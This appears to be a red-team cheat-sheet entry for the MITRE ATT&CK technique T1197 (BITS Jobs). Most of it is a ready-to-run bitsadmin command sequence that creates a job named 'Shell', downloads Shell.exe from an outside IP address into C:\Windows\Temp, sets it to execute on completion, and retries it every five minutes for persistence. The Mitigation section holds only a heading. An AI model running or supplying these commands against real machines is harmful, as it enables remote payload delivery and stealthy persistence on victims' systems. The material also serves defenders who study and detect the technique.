BITS Jobs
https://attack.mitre.org/techniques/T1197/
Techniques
# Create BITS Job
bitsadmin /create Shell
# Point to URL of shell
bitsadmin /addfile Shell "http://10.10.10.200/Shell.exe" "C:\Windows\Temp\Shell.exe"
# Set Command
bitsadmin /SetNotifyCmdLine Shell C:\Windows\Temp\Shell.exe NUL
# Set to run every 5 minutes on transient error
bitsadmin /SetMinRetryDelay "Shell" 300
# Resume job
bitsadmin /resume Shell

Mitigation
Further Reading
Last updated